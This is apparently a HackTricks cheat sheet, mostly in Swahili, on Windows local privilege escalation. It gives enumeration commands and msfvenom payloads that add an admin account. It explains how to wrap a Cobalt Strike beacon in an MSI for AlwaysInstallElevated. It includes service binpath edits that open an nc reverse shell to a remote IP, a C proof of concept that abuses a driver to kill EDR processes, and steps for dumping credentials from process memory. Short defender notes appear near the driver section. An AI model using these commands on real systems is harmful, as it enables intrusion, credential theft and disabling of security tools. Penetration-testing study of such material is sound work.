Windows Local Privilege Escalation

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Chombo bora cha kutafuta Windows local privilege escalation vectors: WinPEAS

Nadharia ya Mwanzo ya Windows

Access Tokens

If you don’t know what are Windows Access Tokens, read the following page before continuing:

Access Tokens

ACLs - DACLs/SACLs/ACEs

Check the following page for more info about ACLs - DACLs/SACLs/ACEs:

ACLs - DACLs/SACLs/ACEs

Integrity Levels

If you don’t know what are integrity levels in Windows you should read the following page before continuing:

Integrity Levels

Udhibiti wa Usalama wa Windows

Kuna mambo mbalimbali ndani ya Windows ambayo yanaweza kukuzuia kuorodhesha mfumo, kuendesha executables au hata kutambua shughuli zako. Unapaswa kusoma ukurasa ufuatao na kuorodhesha mbinu zote hizi za ulinzi kabla ya kuanza privilege escalation enumeration:

Windows Security Controls

Taarifa za Mfumo

Uorodheshaji wa taarifa za toleo

Angalia ikiwa toleo la Windows lina udhaifu unaojulikana (angalia pia patches zilizotumika).

systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get system architecture

[System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
Get-Hotfix -description "Security update" #List only "Security Update" patches

Exploits za Toleo

Tovuti hii site ni nzuri kwa kutafuta taarifa za kina kuhusu udhaifu wa usalama wa Microsoft. Hifadhidata hii ina zaidi ya 4,700 udhaifu wa usalama, ikionyesha massive attack surface ambayo mazingira ya Windows yanatoa.

On the system

post/windows/gather/enum_patches
post/multi/recon/local_exploit_suggester
watson
winpeas (Winpeas ina watson imejumuishwa)

Locally with system information

Github repos of exploits:

Mazingira

Je, kuna credential/Juicy info zilizosajiliwa katika env variables?

set
dir env:
Get-ChildItem Env: | ft Key,Value -AutoSize

PowerShell Historia

ConsoleHost_history #Find the PATH where is saved

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw

Faili za transcript za PowerShell

Unaweza kujifunza jinsi ya kuiwasha hapa: https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/

#Check is enable in the registry
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
dir C:\Transcripts

#Start a Transcription session
Start-Transcript -Path "C:\transcripts\transcript0.txt" -NoClobber
Stop-Transcript

PowerShell Module Logging

Maelezo ya utekelezaji wa PowerShell pipeline hurekodiwa, ikijumuisha amri zilizotekelezwa, miito ya amri, na sehemu za scripts. Hata hivyo, maelezo kamili ya utekelezaji na matokeo ya output yanaweza yasikamatwe.

Ili kuwezesha hili, fuata maelekezo katika sehemu ya “Transcript files” ya nyaraka, ukichagua “Module Logging” badala ya “Powershell Transcription”.

reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging

Ili kuona matukio 15 ya mwisho kutoka kwenye logi za PowersShell, unaweza kutekeleza:

Get-WinEvent -LogName "windows Powershell" | select -First 15 | Out-GridView

PowerShell Script Block Logging

Rekodi kamili ya shughuli na ya yaliyomo yote ya utekelezaji wa script inakamatwa, ikihakikisha kwamba kila block of code imeandikwa wakati inapoendeshwa. Mchakato huu unahifadhi audit trail kamili ya kila shughuli, muhimu kwa forensics na kwa kuchambua tabia ya uharibifu. Kwa kurekodi shughuli zote wakati wa utekelezaji, panapatikana ufahamu wa kina kuhusu mchakato.

reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging

Matukio za logi za Script Block zinaweza kupatikana ndani ya Windows Event Viewer katika njia: Application and Services Logs > Microsoft > Windows > PowerShell > Operational.
Ili kuona matukio 20 ya mwisho unaweza kutumia:

Get-WinEvent -LogName "Microsoft-Windows-Powershell/Operational" | select -first 20 | Out-Gridview

Mipangilio ya Intaneti

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings"

Diski

wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root

WSUS

Unaweza kupata udhibiti wa mfumo ikiwa masasisho yameombwa kwa http badala ya httpS.

Unaanza kwa kukagua ikiwa mtandao unatumia masasisho ya WSUS yasiyo na SSL kwa kuendesha yafuatayo kwenye cmd:

reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer

Au yafuatayo katika PowerShell:

Get-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate -Name "WUServer"

Ikiwa utapokea jibu kama mojawapo ya haya:

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
WUServer    REG_SZ    http://xxxx-updxx.corp.internal.com:8535

WUServer     : http://xxxx-updxx.corp.internal.com:8530
PSPath       : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows\windowsupdate
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows
PSChildName  : windowsupdate
PSDrive      : HKLM
PSProvider   : Microsoft.PowerShell.Core\Registry

Na ikiwa HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer au Get-ItemProperty -Path hklm:\software\policies\microsoft\windows\windowsupdate\au -name "usewuserver" ni sawa na 1.

Basi, inaweza kutumiwa. Ikiwa registry ya mwisho ni sawa na 0, basi entry ya WSUS itapuuuzwa.

Ili kutumia udhaifu huu unaweza kutumia zana kama: Wsuxploit, pyWSUS - Hizi ni scripts za uundaji wa silaha za MiTM za kuingiza masasisho ‘bandia’ katika trafiki ya WSUS isiyokuwa SSL.

Read the research here:

WSUS CVE-2020-1013

Read the complete report here.
Kwa ujumla, hii ndicho hitilafu ambayo mdudu huyu anaitumia:

Ikiwa tuna nguvu ya kubadilisha proxy ya mtumiaji wetu wa localhost, na Windows Updates inatumia proxy iliyowekwa katika mipangilio ya Internet Explorer, basi tuna uwezo wa kuendesha PyWSUS ndani ya mashine yetu ili kuingilia trafiki yetu na kuendesha msimbo kama mtumiaji mwenye hadhi iliyoongezwa kwenye kifaa chetu.

Zaidi ya hayo, kwa kuwa huduma ya WSUS inatumia mipangilio ya mtumiaji wa sasa, itatumia pia duka la vyeti la mtumiaji huyo. Ikiwa tutaunda cheti kiliojisaini kwa hostname ya WSUS na kuingiza cheti hicho kwenye duka la vyeti la mtumiaji wa sasa, tutaweza kuingilia trafiki ya WSUS ya HTTP na HTTPS. WSUS hainyanyui taratibu zinazofanana na HSTS kutekeleza uthibitisho wa aina ya trust-on-first-use kwa cheti. Ikiwa cheti kilichowasilishwa kinatambuliwa na mtumiaji na kina hostname sahihi, kitatambuliwa na huduma.

Unaweza kutumia udhaifu huu kwa kutumia zana WSUSpicious (mara itakapopatikana).

Third-Party Auto-Updaters and Agent IPC (local privesc)

Many enterprise agents expose a localhost IPC surface and a privileged update channel. If enrollment can be coerced to an attacker server and the updater trusts a rogue root CA or weak signer checks, a local user can deliver a malicious MSI that the SYSTEM service installs. See a generalized technique (based on the Netskope stAgentSvc chain – CVE-2025-0309) here:

Abusing Auto Updaters And Ipc

KrbRelayUp

A local privilege escalation vulnerability exists in Windows domain environments under specific conditions. These conditions include environments where LDAP signing is not enforced, users possess self-rights allowing them to configure Resource-Based Constrained Delegation (RBCD), and the capability for users to create computers within the domain. It is important to note that these requirements are met using default settings.

Find the exploit in https://github.com/Dec0ne/KrbRelayUp

For more information about the flow of the attack check https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/

AlwaysInstallElevated

If these 2 registers are enabled (value is 0x1), then users of any privilege can install (execute) *.msi files as NT AUTHORITY\SYSTEM.

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Metasploit payloads

msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi #No uac format
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi #Using the msiexec the uac wont be prompted

Ikiwa una meterpreter session unaweza kuendesha kiotomatiki mbinu hii ukitumia module exploit/windows/local/always_install_elevated

PowerUP

Tumia amri Write-UserAddMSI kutoka power-up kuunda ndani ya directory ya sasa binary ya Windows MSI ili kuinua ruhusa. Skripti hii inaandika installer ya MSI iliyotayarishwa awali (precompiled) inayouliza kuongeza user/group (kwa hivyo utahitaji GIU access):

Write-UserAddMSI

Just execute the created binary to escalate privileges.

MSI Wrapper

Read this tutorial to learn how to create a MSI wrapper using this tools. Note that you can wrap a “.bat” file if you just want to execute command lines

MSI Wrapper

Create MSI with WIX

Create MSI with Visual Studio

Generate with Cobalt Strike or Metasploit a new Windows EXE TCP payload in C:\privesc\beacon.exe
Open Visual Studio, select Create a new project and type “installer” into the search box. Select the Setup Wizard project and click Next.
Give the project a name, like AlwaysPrivesc, use C:\privesc for the location, select place solution and project in the same directory, and click Create.
Keep clicking Next until you get to step 3 of 4 (choose files to include). Click Add and select the Beacon payload you just generated. Then click Finish.
Highlight the AlwaysPrivesc project in the Solution Explorer and in the Properties, change TargetPlatform from x86 to x64.
There are other properties you can change, such as the Author and Manufacturer which can make the installed app look more legitimate.
Right-click the project and select View > Custom Actions.
Right-click Install and select Add Custom Action.
Double-click on Application Folder, select your beacon.exe file and click OK. This will ensure that the beacon payload is executed as soon as the installer is run.
Under the Custom Action Properties, change Run64Bit to True.
Finally, build it.
If the warning File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86' is shown, make sure you set the platform to x64.

MSI Installation

To execute the installation of the malicious .msi file in background:

msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi

Ili kufanya exploit udhaifu huu unaweza kutumia: exploit/windows/local/always_install_elevated

Antivirus na Vigunduzi

Mipangilio ya Ukaguzi

Mipangilio hii huamua kile kinachokuwa logged, kwa hivyo unapaswa kuzingatia

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit

WEF

Windows Event Forwarding, inavutia kujua logs zinatumwa wapi

reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager

LAPS

LAPS imeundwa kwa ajili ya usimamizi wa local Administrator passwords, kuhakikisha kuwa kila nenosiri ni la kipekee, limetengenezwa kwa nasibu, na linasasishwa mara kwa mara kwenye kompyuta zilizojiunga na domain. Nenosiri hizi zinahifadhiwa kwa usalama ndani ya Active Directory na zinaweza kufikiwa tu na watumiaji waliopewa ruhusa za kutosha kupitia ACLs, zikiruhusu kuona local admin passwords ikiwa wameidhinishwa.

LAPS

WDigest

Ikiwa imewezeshwa, nenosiri za plain-text zimehifadhiwa katika LSASS (Local Security Authority Subsystem Service).
More info about WDigest in this page.

reg query 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' /v UseLogonCredential

LSA Protection

Kuanzia Windows 8.1, Microsoft ilianzisha ulinzi ulioimarishwa kwa Local Security Authority (LSA) ili kuzuia jaribio la michakato isiyotegemewa kusoma kumbukumbu yake au kuingiza msimbo, ikiboresha usalama wa mfumo.
More info about LSA Protection here.

reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA' /v RunAsPPL

Credentials Guard

Credential Guard ilianzishwa katika Windows 10. Lengo lake ni kulinda credentials zilizohifadhiwa kwenye kifaa dhidi ya vitisho kama pass-the-hash attacks.| More info about Credentials Guard here.

reg query 'HKLM\System\CurrentControlSet\Control\LSA' /v LsaCfgFlags

Cached Credentials

Domain credentials zinathibitishwa na Local Security Authority (LSA) na zinatumiwa na vipengele vya mfumo wa uendeshaji. Wakati data ya kuingia ya mtumiaji inathibitishwa na security package iliyosajiliwa, domain credentials za mtumiaji kwa kawaida huundwa.
More info about Cached Credentials here.

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT

Watumiaji & Makundi

Orodhesha Watumiaji & Makundi

Unapaswa kuangalia kama yoyote ya makundi unayomo ina ruhusa za kuvutia

# CMD
net users %username% #Me
net users #All local users
net localgroup #Groups
net localgroup Administrators #Who is inside Administrators group
whoami /all #Check the privileges

# PS
Get-WmiObject -Class Win32_UserAccount
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
Get-LocalGroupMember Administrators | ft Name, PrincipalSource

Vikundi vyenye ruhusa

Ikiwa uko katika kundi lenye ruhusa maalum, unaweza kuwa na uwezo wa kupandisha ruhusa. Jifunze kuhusu vikundi vyenye ruhusa na jinsi ya kuvitumia vibaya ili kupandisha ruhusa hapa:

Privileged Groups

Token manipulation

Jifunze zaidi kuhusu token ni nini kwenye ukurasa huu: Windows Tokens.
Angalia ukurasa ufuatao ili kujifunza kuhusu tokens zinazovutia na jinsi ya kuzitumia vibaya:

Abusing Tokens

Watumiaji walioingia / Vikao

qwinsta
klist sessions

Folda za nyumbani

dir C:\Users
Get-ChildItem C:\Users

Sera ya Nywila

net accounts

Pata yaliyomo kwenye clipboard

powershell -command "Get-Clipboard"

Michakato Zinazoendesha

Ruhusa za Faili na Folda

Kwanza kabisa, unapoorodhesha michakato angalia passwords ndani ya mstari wa amri wa mchakato.
Angalia ikiwa unaweza overwrite some binary running au kama una ruhusa za kuandika kwenye folda ya binary ili kutumia DLL Hijacking attacks:

Tasklist /SVC #List processes running and services
tasklist /v /fi "username eq system" #Filter "system" processes

#With allowed Usernames
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize

#Without usernames
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id

Daima angalia uwezekano wa electron/cef/chromium debuggers running, you could abuse it to escalate privileges.

Kuangalia ruhusa za binaries za michakato

for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (
for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do (
icacls "%%z"
2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.
)
)

Kukagua ruhusa za folda za binaries za michakato (DLL Hijacking)

for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v
"system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('echo %%x') do (
icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users
todos %username%" && echo.
)

Uchimbaji wa nywila katika kumbukumbu

Unaweza kuunda dump ya kumbukumbu ya mchakato unaoendesha ukitumia procdump kutoka sysinternals. Huduma kama FTP zina credentials katika maandishi wazi katika kumbukumbu; jaribu ku-dump kumbukumbu na kusoma credentials.

procdump.exe -accepteula -ma <proc_name_tasklist>

Insecure GUI apps

Applications running as SYSTEM may allow an user to spawn a CMD, or browse directories.

Mfano: “Windows Help and Support” (Windows + F1), search for “command prompt”, click on “Click to open Command Prompt”

Services

Service Triggers huruhusu Windows kuanza service wakati masharti maalum yanapotokea (named pipe/RPC endpoint activity, ETW events, IP availability, device arrival, GPO refresh, etc.). Hata bila haki za SERVICE_START mara nyingi unaweza kuanza services zilizo na vibali vya juu kwa kuwasha triggers zao. Tazama mbinu za enumeration na activation hapa:

Service Triggers

Pata orodha ya services:

net start
wmic service list brief
sc query
Get-Service

Ruhusa

Unaweza kutumia sc kupata taarifa za service

sc qc <service_name>

Inashauriwa kuwa na binary accesschk kutoka Sysinternals ili kuangalia kiwango kinachohitajika cha ruhusa kwa kila huduma.

accesschk.exe -ucqv <Service_Name> #Check rights for different groups

Inashauriwa kukagua ikiwa “Authenticated Users” wanaweza kubadilisha huduma yoyote:

accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv %USERNAME% * /accepteula
accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul
accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version

Unaweza kupakua accesschk.exe kwa XP hapa

Wezesha huduma

Iwapo unapata hitilafu hii (kwa mfano na SSDPSRV):

System error 1058 has occurred.
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

Unaweza kuiwezesha kwa kutumia

sc config SSDPSRV start= demand
sc config SSDPSRV obj= ".\LocalSystem" password= ""

Chukulia kuwa huduma upnphost inategemea SSDPSRV ili ifanye kazi (kwa XP SP1)

Njia nyingine mbadala ya tatizo hili ni kuendesha:

sc.exe config usosvc start= auto

Badilisha njia ya binary ya service

Katika hali ambapo kundi la “Authenticated users” lina SERVICE_ALL_ACCESS kwa service, inawezekana kubadilisha binary inayotekelezwa ya service. Ili kubadilisha na kuendesha sc:

sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config <Service_Name> binpath= "net localgroup administrators username /add"
sc config <Service_Name> binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"

sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe"

Anzisha upya huduma

wmic service NAMEOFSERVICE call startservice
net stop [service name] && net start [service name]

Upandishaji wa ruhusa unaweza kufanywa kupitia ruhusa mbalimbali:

SERVICE_CHANGE_CONFIG: Inaruhusu kubadilisha usanidi wa binary ya service.
WRITE_DAC: Inawezesha kurekebisha ruhusa, na hivyo kuruhusu kubadilisha usanidi wa service.
WRITE_OWNER: Inaruhusu kupata umiliki na kurekebisha ruhusa.
GENERIC_WRITE: Inarithi uwezo wa kubadilisha usanidi wa service.
GENERIC_ALL: Pia inarithi uwezo wa kubadilisha usanidi wa service.

Kwa kutambua na kutumia udhaifu huu, exploit/windows/local/service_permissions inaweza kutumika.

Ruhusa dhaifu za binary za service

Angalia ikiwa unaweza kubadilisha binary inayotekelezwa na service au ikiwa una ruhusa za kuandika kwenye folda ambapo binary iko (DLL Hijacking).
Unaweza kupata binary zote zinazotekelezwa na service kwa kutumia wmic (not in system32) na kuangalia ruhusa zako kwa kutumia icacls:

for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt

for /f eol^=^"^ delims^=^" %a in (%temp%\perm.txt) do cmd.exe /c icacls "%a" 2>nul | findstr "(M) (F) :\"

Unaweza pia kutumia sc na icacls:

sc query state= all | findstr "SERVICE_NAME:" >> C:\Temp\Servicenames.txt
FOR /F "tokens=2 delims= " %i in (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txt
FOR /F %i in (C:\Temp\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> C:\Temp\path.txt

Idhini za kubadilisha rejista ya huduma

Unapaswa kuangalia kama unaweza kubadilisha rejista yoyote ya huduma.
Unaweza kuangalia idhini zako juu ya rejista ya huduma kwa kufanya:

reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Get the binary paths of the services

#Try to write every service with its current content (to check if you have write permissions)
for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv 2>nul & reg save %a %temp%\reg.hiv 2>nul && reg restore %a %temp%\reg.hiv 2>nul && echo You can modify %a

get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "<Username> Users Path Everyone"

Inapaswa kukaguliwa kama Authenticated Users au NT AUTHORITY\INTERACTIVE wanamiliki ruhusa za FullControl. Ikiwa hivyo, binary inayotekelezwa na service inaweza kubadilishwa.

Ili kubadilisha Path ya binary inayotekelezwa:

reg add HKLM\SYSTEM\CurrentControlSet\services\<service_name> /v ImagePath /t REG_EXPAND_SZ /d C:\path\new\binary /f

Services registry AppendData/AddSubdirectory permissions

Ikiwa una ruhusa hii juu ya registry maana yake ni kwamba unaweza kuunda sub registries kutoka kwa hii. Katika kesi ya Windows services hii ni ya kutosha kutekeleza msimbo wowote:

AppendData/AddSubdirectory permission over service registry

Unquoted Service Paths

Ikiwa njia ya executable haiko ndani ya nukuu, Windows itajaribu kutekeleza kila sehemu inayofuata kabla ya nafasi.

Kwa mfano, kwa njia C:\Program Files\Some Folder\Service.exe Windows itajaribu kutekeleza:

C:\Program.exe
C:\Program Files\Some.exe
C:\Program Files\Some Folder\Service.exe

Orodhesha njia zote za huduma zisizo na nukuu, ukiondoa zile za huduma za Windows zilizojengwa:

wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v '\"'
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows\\system32\\" |findstr /i /v '\"'  # Not only auto services

# Using PowerUp.ps1
Get-ServiceUnquoted -Verbose

for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do (
echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo.
)
)

gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name

Unaweza kugundua na exploit udhaifu huu kwa metasploit: exploit/windows/local/trusted\_service\_path Unaweza kuunda service binary kwa mkono kwa metasploit:

msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe

Hatua za Urejesho

Windows inaruhusu watumiaji kutaja vitendo vitakavyofanywa ikiwa huduma itashindwa. Kipengele hiki kinaweza kusanidiwa kuelekeza kwa binary. Ikiwa binary hii inaweza kubadilishwa, privilege escalation inaweza kuwa inawezekana. Maelezo zaidi yanapatikana katika nyaraka rasmi.

Programu

Programu Zilizowekwa

Angalia idhinishaji za binaries (labda unaweza kuibadilisha moja na escalate privileges) na za folda (DLL Hijacking).

dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE

Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name

Ruhusa za Kuandika

Angalia ikiwa unaweza kuhariri config file ili kusoma faili maalum, au ikiwa unaweza kuhariri binary itakayotekelezwa na Administrator account (schedtasks).

Njia ya kupata ruhusa dhaifu za folda/faili kwenye mfumo ni kufanya:

accesschk.exe /accepteula
# Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
accesschk.exe -uwdqs "Everyone" c:\
# Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
accesschk.exe -uwdqs "Everyone" c:\*.*

icacls "C:\Program Files\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
icacls ":\Program Files (x86)\*" 2>nul | findstr "(F) (M) C:\" | findstr ":\ everyone authenticated users todos %username%"

Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}}

Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}

Endeshwa wakati wa kuanzishwa

Angalia ikiwa unaweza overwrite registry au binary ambayo itatekelezwa na user mwingine.
Soma ukurasa unaofuata ili ujifunze zaidi kuhusu maeneo ya kuvutia ya autoruns ili escalate privileges:

Privilege Escalation with Autoruns

Drivers

Tafuta drivers zinazoweza kuwa third party weird/vulnerable

driverquery
driverquery.exe /fo table
driverquery /SI

If a driver exposes an arbitrary kernel read/write primitive (common in poorly designed IOCTL handlers), you can escalate by stealing a SYSTEM token directly from kernel memory. See the step‑by‑step technique here:

Arbitrary Kernel Rw Token Theft

For race-condition bugs where the vulnerable call opens an attacker-controlled Object Manager path, deliberately slowing the lookup (using max-length components or deep directory chains) can stretch the window from microseconds to tens of microseconds:

Kernel Race Condition Object Manager Slowdown

Registry hive memory corruption primitives

Vulnerabilities za registry hive za kisasa zinakuwezesha kuandaa layouts zinazotabirika, kutumia vibaya descendants zinazoandikwa za HKLM/HKU, na kubadilisha uharibifu wa metadata kuwa kernel paged-pool overflows bila driver maalum. Jifunze mnyororo mzima hapa:

Windows Registry Hive Exploitation

Abusing missing FILE_DEVICE_SECURE_OPEN on device objects (LPE + EDR kill)

Some signed third‑party drivers create their device object with a strong SDDL via IoCreateDeviceSecure but forget to set FILE_DEVICE_SECURE_OPEN in DeviceCharacteristics. Without this flag, the secure DACL is not enforced when the device is opened through a path containing an extra component, letting any unprivileged user obtain a handle by using a namespace path like:

\ .\DeviceName\anything
\ .\amsdk\anyfile (from a real-world case)

Once a user can open the device, privileged IOCTLs exposed by the driver can be abused for LPE and tampering. Example capabilities observed in the wild:

Return full-access handles to arbitrary processes (token theft / SYSTEM shell via DuplicateTokenEx/CreateProcessAsUser).
Unrestricted raw disk read/write (offline tampering, boot-time persistence tricks).
Terminate arbitrary processes, including Protected Process/Light (PP/PPL), allowing AV/EDR kill from user land via kernel.

Minimal PoC pattern (user mode):

// Example based on a vulnerable antimalware driver
#define IOCTL_REGISTER_PROCESS  0x80002010
#define IOCTL_TERMINATE_PROCESS 0x80002048

HANDLE h = CreateFileA("\\\\.\\amsdk\\anyfile", GENERIC_READ|GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0);
DWORD me = GetCurrentProcessId();
DWORD target = /* PID to kill or open */;
DeviceIoControl(h, IOCTL_REGISTER_PROCESS,  &me,     sizeof(me),     0, 0, 0, 0);
DeviceIoControl(h, IOCTL_TERMINATE_PROCESS, &target, sizeof(target), 0, 0, 0, 0);

Hatua za kupunguza kwa watengenezaji

Daima weka FILE_DEVICE_SECURE_OPEN unapotengeneza device objects zinazokusudiwa kuzuiliwa na DACL.
Thibitisha muktadha wa mwito kwa operesheni zenye ruhusa za juu. Ongeza ukaguzi wa PP/PPL kabla ya kuruhusu kumalizika kwa mchakato au kurudishwa kwa handle.
Zuia IOCTLs (access masks, METHOD_*, input validation) na fikiria kutumia brokered models badala ya ruhusa za moja kwa moja za kernel.

Mawazo ya utambuzi kwa watetezi

Fuatilia ufunguaji wa user-mode wa majina ya vifaa yenye shaka (mf., \.\amsdk*) na mfululizo maalum wa IOCTL unaoashiria matumizi mabaya.
Tekeleza orodha ya kuzuia madereva walio hatarishi ya Microsoft (HVCI/WDAC/Smart App Control) na tunza orodha zako za kuruhusu/kukatiza.

PATH DLL Hijacking

Kama una write permissions inside a folder present on PATH, unaweza hijack DLL inayopakiwa na mchakato na hivyo escalate privileges.

Kagua ruhusa za folda zote ndani ya PATH:

for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )

Kwa maelezo zaidi kuhusu jinsi ya kutumia vibaya ukaguzi huu:

Writable Sys Path +Dll Hijacking Privesc

Mtandao

Sehemu zilizoshirikiwa

net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares

hosts file

Kagua kompyuta nyingine zinazojulikana zilizohardcoded kwenye hosts file

type C:\Windows\System32\drivers\etc\hosts

Violesura vya Mtandao & DNS

ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
